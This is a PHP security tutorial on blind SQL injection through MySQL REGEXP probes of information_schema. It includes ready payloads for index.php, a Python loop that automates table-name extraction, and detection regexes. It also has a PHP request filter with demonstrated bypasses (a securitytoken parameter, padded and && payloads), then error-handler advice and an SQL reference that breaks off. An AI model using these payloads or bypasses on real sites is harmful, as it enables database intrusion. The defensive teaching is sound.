Regular Expressions and SQL: regular expressions for common SQL attacks in PHP
This article describes the regular expressions behind common SQL attacks in PHP, shared here for your reference. The analysis is as follows:
In MySQL 5.0 and later the names of all databases, tables and columns are stored in the information_schema database, which is what makes the following attack possible:
1. Determine whether the first character of the first table name is in the range a-z (blind_sqli is the database name, which is already known; the trailing /* comments out the rest of the original query).
Note: in the regular expression, ^[a-z] means that the first character of the string is in the range a-z.
The code is as follows:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)/*
2. Narrow it down: is the first character in the range a-n?
The code is as follows:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*
3. Confirm that the character is n.
The code is as follows:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)/*
4. Extend the expression one character at a time in the same way:
'^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE
At this point the table name is news. To verify it, use the anchored expression '^news$'; there is no need to test table_name = 'news' directly. (MySQL's REGEXP is case-insensitive on non-binary columns, so '^news$' also matches News; use REGEXP BINARY or an = comparison if the case matters.)
5. The remaining tables are enumerated by changing the LIMIT offset. Be aware that LIMIT is applied after the REGEXP filter, so LIMIT 1,1 asks whether a second table matches the current pattern, not whether the second table matches it; to pin the search to the N-th table independently of the pattern, put the LIMIT in an inner subquery that returns table_name and apply REGEXP to that subquery's result.
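The five steps above as a working extraction loop. This is an added example, not code from the original article, and it is written in Python rather than as a series of requests to index.php: the two oracle functions stand in for the yes/no answer the server would give (the constructed TABLES list replaces information_schema), and the assumed character set ALPHABET, the bisection in next_char and the positional_payload variant are my additions. Running it also shows why step 5 needs care: with the article's payload, LIMIT is applied after the REGEXP filter, so the second table comes out as garbage and fails the '^name$' confirmation, whereas moving the LIMIT into an inner subquery that returns the name recovers every table.

```python
import re
import string
from typing import Callable, Optional

# Constructed stand-in for the rows of information_schema.tables that belong to
# the target schema (the article's "blind_sqli").  In a real run the two oracle
# functions below would send the payload to index.php and map the response to
# true/false; everything else stays the same.
TABLES = ["news", "users"]

# Character set assumed for table names in this demo (the article uses [a-z]).
ALPHABET = string.ascii_lowercase + string.digits + "_"

Oracle = Callable[[str, int], bool]


def page_payload(pattern: str, index: int) -> str:
    """The value of id= that the article sends for one yes/no question."""
    return ('1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" '
            f"AND table_name REGEXP '{pattern}' LIMIT {index},1)/*")


def oracle_page(pattern: str, index: int) -> bool:
    """Truth value of page_payload(): LIMIT is applied after the WHERE filter,
    so this only says whether at least index+1 tables match the pattern.
    MySQL REGEXP is case-insensitive on non-binary columns, hence re.I."""
    hits = [t for t in TABLES if re.search(pattern, t, re.I)]
    return len(hits) > index


def positional_payload(pattern: str, index: int) -> str:
    """Variant with LIMIT moved into an inner subquery that returns the name,
    so the pattern is tested against exactly the index-th table."""
    return ("1 and (SELECT table_name FROM information_schema.tables "
            f"WHERE TABLE_SCHEMA=\"blind_sqli\" LIMIT {index},1) REGEXP '{pattern}'/*")


def oracle_positional(pattern: str, index: int) -> bool:
    """Truth value of positional_payload(); past the last table the subquery
    yields NULL, which compares false."""
    if index >= len(TABLES):
        return False
    return re.search(pattern, TABLES[index], re.I) is not None


def next_char(oracle: Oracle, prefix: str, index: int) -> Optional[str]:
    """Steps 1-3 of the article: halve the candidate set with a character class
    ([a-n] against [o-z], and so on) until one character is left.  None means
    nothing follows the prefix, i.e. the name is complete."""
    cands = ALPHABET
    if not oracle(f"^{re.escape(prefix)}[{cands}]", index):
        return None
    while len(cands) > 1:
        mid = len(cands) // 2
        if oracle(f"^{re.escape(prefix)}[{cands[:mid]}]", index):
            cands = cands[:mid]
        else:
            cands = cands[mid:]
    return cands


def extract_name(oracle: Oracle, index: int) -> Optional[str]:
    """Step 4: grow the prefix ('^n' -> '^ne' -> '^new' ...) until nothing follows."""
    if not oracle("^", index):   # no row at this offset: enumeration is finished
        return None
    name = ""
    while (char := next_char(oracle, name, index)) is not None:
        name += char
    return name


def confirmed(oracle: Oracle, name: str, index: int) -> bool:
    """The article's final check with an anchored pattern such as '^news$'."""
    return oracle(f"^{re.escape(name)}$", index)


def dump_tables(oracle: Oracle, max_tables: int = 16) -> list:
    """Step 5: walk the LIMIT offset until no row comes back."""
    names = []
    for index in range(max_tables):
        name = extract_name(oracle, index)
        if name is None:
            break
        names.append(name)
    return names


if __name__ == "__main__":
    for label, oracle in (("article's LIMIT placement", oracle_page),
                          ("positional LIMIT", oracle_positional)):
        names = dump_tables(oracle)
        print(label, "->", [(n, confirmed(oracle, n, i)) for i, n in enumerate(names)])
```

Each oracle call costs one HTTP request, so the bisection matters: with a 37-character alphabet it needs about six requests per character instead of up to 37. The `^` probe at the start of extract_name is what terminates the enumeration cleanly once the LIMIT offset runs past the last table.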
Some regular expressions commonly used to detect such requests (PHP strings, each applied as an unanchored pattern), for example:
$Exec_Commond = '(\s|\S)*(exec(\s|\+)+(s|x)p\w+)(\s|\S)*';
$Simple_XSS = '(\s|\S)*((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)(\s|\S)*';
$Eval_XSS = '(\s|\S)*((%65)|e)(\s)*((%76)|v)(\s)*((%61)|a)(\s)*((%6C)|l)(\s|\S)*';
$Image_XSS = '(\s|\S)*((%3C)|<)((%69)|i|I|(%49))((%6D)|m|M|(%4D))((%67)|g|G|(%47))[^\n]+((%3E)|>)(\s|\S)*';
$Script_XSS = '(\s|\S)*((%73)|s)(\s)*((%63)|c)(\s)*((%72)|r)(\s)*((%69)|i)(\s)*((%70)|p)(\s)*((%74)|t)(\s|\S)*';
$SQL_Injection = '(\s|\S)*((%27)|(\')|(%3D)|(=)|(/)|(%2F)|(")|(%22)|((-|%2D){2})|(%23)|(%3B)|(;))+(\s|\S)*';
The leading and trailing (\s|\S)* never change the outcome of an unanchored preg_match() and only add backtracking; note also that $SQL_Injection fires on any value containing = or /, so it is far too broad to block on by itself.
Filter code for SQL attacks:
The code is as follows:
<?php
function customError($errno, $errstr, $errfile, $errline)
{
    echo "<b>Error number:</b> [$errno], error on line $errline in $errfile<br />";
    die();
}
// Note: PHP never delivers E_ERROR (nor E_PARSE, E_CORE_* or E_COMPILE_*) to a
// user handler, so with this level the handler above is never called; use E_ALL
// or a mask of warnings/notices to see it run.
set_error_handler("customError", E_ERROR);

// Patterns for GET, POST and cookie values, used unanchored with the "is" flags.
// \b, \s, \/ and \* are PCRE escapes; PHP leaves them untouched in a double-quoted string.
$getfilter = "'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
$postfilter = "\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
$cookiefilter = $postfilter;   // the cookie pattern is identical to the POST pattern

function StopAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq)
{
    if (is_array($StrFiltValue)) {
        $StrFiltValue = implode('', $StrFiltValue);
    }
    // Caveat: the filter is skipped whenever a parameter named securitytoken is
    // merely present, whatever its value, so appending &securitytoken=1 bypasses
    // it; a real deployment must validate the token's value, not its presence.
    if (preg_match("/" . $ArrFiltReq . "/is", $StrFiltValue) == 1 && !isset($_REQUEST['securitytoken'])) {
        // The log is an .htm file, so attacker-controlled strings are escaped
        // before being written to it.  date() replaces strftime(), which is
        // deprecated since PHP 8.1.
        slog("<br>Operation IP: " . $_SERVER["REMOTE_ADDR"]
            . "<br>Operation time: " . date("Y-m-d H:i:s")
            . "<br>Operation page: " . htmlspecialchars($_SERVER["PHP_SELF"])
            . "<br>Submission method: " . $_SERVER["REQUEST_METHOD"]
            . "<br>Submitted parameter: " . htmlspecialchars($StrFiltKey)
            . "<br>Submitted data: " . htmlspecialchars($StrFiltValue));
        print "result notice: Illegal operation!";
        exit();
    }
}

foreach ($_GET as $key => $value) {
    StopAttack($key, $value, $getfilter);
}
foreach ($_POST as $key => $value) {
    StopAttack($key, $value, $postfilter);
}
foreach ($_COOKIE as $key => $value) {
    StopAttack($key, $value, $cookiefilter);
}

// Append one record to log.htm.  Keep this file outside the web root, otherwise
// anyone who guesses its name can read the logged requests.
function slog($logs)
{
    $toppath = "log.htm";
    $Ts = fopen($toppath, "a+");
    fputs($Ts, $logs . "\r\n");
    fclose($Ts);
}
?>
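The StopAttack patterns above, together with the $Simple_XSS, $Image_XSS and $SQL_Injection expressions from the earlier list, run over constructed request parameters. This is an added example, not part of the original article, and it is Python rather than PHP: the patterns are transcribed for Python's re module (PHP's "is" flags become re.I | re.S), and the request dictionaries and the is_blocked/scan helpers are constructed here to mirror StopAttack. It shows what each filter catches and what slips past it: the GET filter blocks any value containing an apostrophe, a legitimate book title included, while the POST filter's .{1,6}? window and its reliance on the words and/or let a boolean injection through when the attacker pads with spaces or writes && instead. Filters of this kind are a logging layer at best; the fix for the injection itself is parameterized queries.

```python
import re

# The article's PCRE patterns transcribed for Python's re module.  The
# StopAttack filters are compiled with PHP's "is" flags (case-insensitive, dot
# matches newline), i.e. re.I | re.S here; "/" needs no escaping because Python
# has no pattern delimiter.  The leading and trailing (\s|\S)* of the first list
# are dropped: for an unanchored search they never change the verdict.
SQL_INJECTION = re.compile(
    r"((%27)|(')|(%3D)|(=)|(/)|(%2F)|(\")|(%22)|((-|%2D){2})|(%23)|(%3B)|(;))+", re.I)
SIMPLE_XSS = re.compile(r"((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)", re.I)
IMAGE_XSS = re.compile(
    r"((%3C)|<)((%69)|i|I|(%49))((%6D)|m|M|(%4D))((%67)|g|G|(%47))[^\n]+((%3E)|>)", re.I)

_COMMON = (
    r"|/\*.+?\*/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET"
    r"|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM"
    r"|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)"
)
GET_FILTER = re.compile(r"'|(and|or)\b.+?(>|<|=|in|like)" + _COMMON, re.I | re.S)
# $postfilter and $cookiefilter are identical on the page.
POST_FILTER = re.compile(r"\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)" + _COMMON, re.I | re.S)


def is_blocked(pattern, value) -> bool:
    """StopAttack's test: an array value is joined as implode() does, then searched."""
    if isinstance(value, (list, tuple)):
        value = "".join(value)
    return pattern.search(value) is not None


def scan(params: dict, pattern) -> list:
    """Names of the parameters whose value trips the pattern (the page's loop
    exits at the first hit; this returns all of them so every verdict is visible)."""
    return [key for key, value in params.items() if is_blocked(pattern, value)]


# Constructed request parameters (not captured traffic).
BLIND_PAYLOAD = ('1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" '
                 "AND table_name REGEXP '^[a-z]' LIMIT 0,1)/*")
SAMPLE_GET = {
    "id": BLIND_PAYLOAD,                               # true positive
    "q": "Harry Potter and the Philosopher's Stone",   # false positive: the bare ' alternative
    "page": "2",                                       # clean
}
SAMPLE_POST = {
    "id": "1 and 1=1",                    # caught by \b(and|or)\b.{1,6}?(=|...)
    "padded": "1 and" + " " * 8 + "1=1",  # missed: 9 characters between "and" and "=" exceed .{1,6}
    "ampersand": "1 && 1=1",              # missed: no and/or keyword at all
    "title": "Harry Potter and the Philosopher's Stone",  # passes: the POST filter has no bare '
}


if __name__ == "__main__":
    print("GET  blocked:", scan(SAMPLE_GET, GET_FILTER))     # ['id', 'q']
    print("POST blocked:", scan(SAMPLE_POST, POST_FILTER))   # ['id']
    for probe in ("a=b", "<script>alert(1)</script>", "<img src=x onerror=alert(1)>"):
        print(repr(probe), "sqli:", is_blocked(SQL_INJECTION, probe),
              "simple_xss:", is_blocked(SIMPLE_XSS, probe),
              "image_xss:", is_blocked(IMAGE_XSS, probe))
```

The padded payload is still caught by the GET filter, whose (and|or)\b.+? has no length cap; the POST filter's .{1,6}? was presumably added to cut false positives, and it does, at the price of the bypass shown. $Simple_XSS only matches a bare tag name followed directly by >, which is why <img src=x onerror=...> needs the separate $Image_XSS pattern.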
Analysis of the error handler:
Once set_error_handler() has registered a handler, PHP's standard error handling is bypassed for the error levels it covers, so the handler itself must decide whether the script stops (hence the die()).
Second, an error that occurs before the handler is registered is still processed by PHP's default mechanism, because the user-defined handler does not exist yet at that point.
In PHP, set_error_handler() installs a user-defined error handler, and trigger_error() raises an error that is routed through it.
set_error_handler() takes the name of the handler function and, optionally, a mask of the error levels it should receive: first define the handler, then register it with the desired levels. Note that E_ERROR, E_PARSE, E_CORE_ERROR, E_CORE_WARNING, E_COMPILE_ERROR and E_COMPILE_WARNING can never be delivered to a user handler, so registering with E_ERROR alone, as the filter code above does, installs a handler that is never called.
Usage:
The code is as follows:
function customError($errno, $errstr, $errfile, $errline)
{
    echo "<b>Error code:</b> [{$errno}] {$errstr}\r\n";
    echo "Error on line {$errline} of file {$errfile}\r\n";
    echo "PHP version ", PHP_VERSION, " (", PHP_OS, ")\r\n";
    // die();
}
// E_STRICT has been part of E_ALL since PHP 5.4 and the constant is deprecated in PHP 8.4,
// so E_ALL alone is enough on current releases.
set_error_handler("customError", E_ALL | E_STRICT);
Summary
When PHP encounters an error it reports the script's location, the line number and the cause. Many people think this is harmless, but the consequences of leaking the real filesystem path can be serious: for an intruder this information is valuable, and a great many servers have this problem. Some administrators simply set display_errors to Off in php.ini, but that is a blunt instrument: during debugging PHP does need to return error details, and when an error occurs the user may need an explanation, or even a redirect to another page. set_error_handler() resolves this conflict, yet it is rarely used. Note that the handlers shown above echo $errfile and PHP_VERSION to the browser, which is exactly the disclosure this section warns about; in production, write those details to the server log with error_log() and show the user a generic message.
I hope this article helps with your PHP programming.
PHP regular expression parsing SQL
The code is as follows:
// A nowdoc is used here because the DEFAULT '0' quotes would terminate a single-quoted string.
$sql = <<<'SQL'
Create table if not exists uploadtype (
    id int(11) not null AUTO_INCREMENT,
    title varchar(20) DEFAULT '0',
    sydefault char(1) DEFAULT '0',
    primary key (id)
)ENGINE=MyISAM
SQL;
// i: case-insensitive, s: dot matches newlines, U: quantifiers are ungreedy by default
preg_match('#create table.*\(.*\)ENGINE=MyISAM#isU', $sql, $typefile);
var_dump($typefile);
Common SQL statements (reference)
SQL categories:
DDL - Data Definition Language (CREATE, ALTER, DROP)
DML - Data Manipulation Language (SELECT, INSERT, UPDATE, DELETE)
DCL - Data Control Language (GRANT, REVOKE)
TCL - Transaction Control Language (COMMIT, ROLLBACK)
First, a brief overview of the basic statements:
1. Create a database:
create database database-name
2. Delete a database:
drop database dbname
3. Back up a SQL Server database:
--- create a device for the backup data
USE master
EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\MyNwind_1.dat'
--- start the backup
BACKUP DATABASE pubs TO testBack
4. Create a new table:
create table tabname (col1 type1 [not null] [primary key], col2 type2 [not null], ...)
Create a new table based on an existing table:
A: create table tab_new like tab_old (copies the definition of the old table)
B: create table tab_new as select col1, col2, ... from tab_old definition only (DB2 syntax)
5. Delete a table: drop table tabname
6. Add a column:
alter table tabname add column col type
Note (DB2): a column cannot be dropped once it has been added, and its data type cannot be changed afterwards; the only change allowed is increasing the length of a varchar column.
7. Add a primary key: alter table tabname add primary key (col)
Delete a primary key: alter table tabname drop primary key
8. Create an index: create [unique] index idxname on tabname (col, ...)
Delete an index: drop index idxname
Note: an index cannot be modified; to change it, drop it and recreate it.
9. Create a view: create view viewname as select_statement
Delete a view: drop view viewname
10. A few simple basic statements:
Select: select * from table1 where condition
Insert: insert into table1 (field1, field2) values (value1, value2)
Delete: delete from table1 where condition
Update: update table1 set field1 = value1 where condition
Search: select * from table1 where field1 like '%value1%' --- LIKE has many subtleties; consult the documentation
Sort: select * from table1 order by field1, field2 [desc]
Total: select count(*) as totalcount from table1
Sum: select sum(field1) as sumvalue from table1
Average: select avg(field1) as avgvalue from table1
Maximum: ......